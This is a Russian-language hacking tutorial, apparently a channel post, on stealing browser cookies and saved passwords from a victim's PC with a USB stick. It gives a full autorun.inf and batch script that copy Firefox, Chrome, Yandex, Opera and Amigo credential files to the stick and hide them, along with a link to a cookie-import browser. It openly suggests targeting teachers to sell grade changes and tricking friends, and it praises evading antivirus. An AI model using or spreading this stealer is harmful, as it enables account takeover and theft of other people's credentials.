Cookiе-стилер из флешки

Привет! Помните, мы уже рассказывали о том, что такое файлы Cookie? Для тех, кто нашу статью не читал, да и просто для освежения памяти, вкратце сейчас расскажу. Это маленькие текстовые документы, внутри которых в зашифрованном виде хранится информация о пользователе. Именно благодаря им сайт знает, что за пользователь на нем находится и какой ему принадлежит аккаунт. Соответственно, если мы украдем эти файлы, то, как не трудно догадаться, сайт посчитает нас тем человеком, у которого мы эти файлы украли.

Сегодня к нам на обзор попал маленький эксплойт, способный угнать эти самые файлы у другого человека. К сожалению, у него есть пара недостатков. Скрипт не сможет автоматически сработать при подключении флешки на всех версиях Windows начиная от семерки с установленными последними обновлениями. Но большинство людей, которые сидят на Windows 7, а таких и сейчас немало, сидят именно на ее начальных версиях, потому что отключили автообновление. И во всех госучреждениях типа школ и университетов стоят либо эти самые семерки без обновлений, либо вообще древние, как говно мамонта, Windows XP, а процесс кражи куков занимает миллисекунды. Что мы имеем? Даем флешку преподу под видом презентации/реферата/доклада/etc, а, пока он смотрит доклад, все куки уже спизжены, а мы можем продавать другим ученикам "улучшение" их оценок. Впрочем, ничего не мешает нам наплести лапши на уши жертве, что хотим что-то скинуть с флешки на ПК.

А плюсы метода? Куда же без них! Метод не палится антивирусом, это уже просто огромное преимущество! По сути вы не загружаете на компьютер троян, и не юзаете какое-нибудь вредоносное ПО. Во время стиллинга вся полученная информация копируется на флешку, где ей присваивается атрибут HIDE, и они стают скрытыми. Метод ссылается на социальную инженерию. Кто бы что ни говорил, а человека взломать легче, чем компьютер. Предлогов может быть море. Попросить друга прийти к нему с флешкой, и скачать музыку, потому что у вас, якобы, интернет отключили. В школе – распечатать презентацию. В интернет-кафе – вообще никаких предлогов не нужно.

"Но как же это все реализовать?" - спросите вы меня. На что я вам с удовольствием сейчас дам ответ. Создаём на флешке 2 текстовых файла. Первый называем “autorun.inf” а второй – “stealer.bat” .bat - исполняемое расширение файла, то есть его можно использовать как программку. Не забудьте включить в проводнике отображение расширений файлов, иначе ничего не получится. В первый прописываем такие строчки:

[AutoRun]
Open=”stealer.bat”

Первый файл отвечает за автозапуск стиллера. Второй - непосредственно сам стиллер. Его следует наполнить такими строчками:

@echo off 
md %~d0\Mozilla 
md %~d0\0pera 
md %~d0\Google 
md %~d0\Yandex 
md %~d0\Amigo
CD/D %APPDATA%\Opera\Opera\ 
cls
copy /y wand.dat %~d0\Opera\ 
copy /y cookies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy /y cookies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
cls
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
cd %localappdata%\Yandex\YandexBrowser\User Data\Default
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex" 
cd %localappdata%\Amigo\User Data\Default
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo" 
cls
ATTRIB -R -A -S -H 
attrib +h %~d0\Mozilla 
attrib +h %~d0\Opera 
attrib +h %~d0\Google 
attrib +h %~d0\Yandex 
attrib +h %~d0\Amigo 
attrib +h %~d0\search.bat 
attrib +h %~d0\new 
attrib +h %~d0\autorun.inf 
del: autorun.inf?

После этого скрываем получившиеся файлы и можем идти стиллить пароли. После того, как операция выполнена успешно - возвращаемся домой, и через Панель управления -> Оформление и персонализация -> Показ скрытых папок и файлов отображаем скрытые на флешке файлы. После этого куки можно вставить в специальный браузер: https://drive.google.com/uc?export=download&confirm=tjUv&id=1THsd4j8fMLp5-ibMDWBgpKYAlFuRZox4. Архив с ним нужно скачать, распаковать, там находится специальный браузер Firefox. Открываем его, жмем F10 и выбираем там вкладку Tools, потом import cookie и выбераем файл с куками. Наслаждаемся.

INVISIBLE - Юмор и мануалы по анонимности!

HIDDEN_PEOPLE - Самый анонимный чат в Telegram!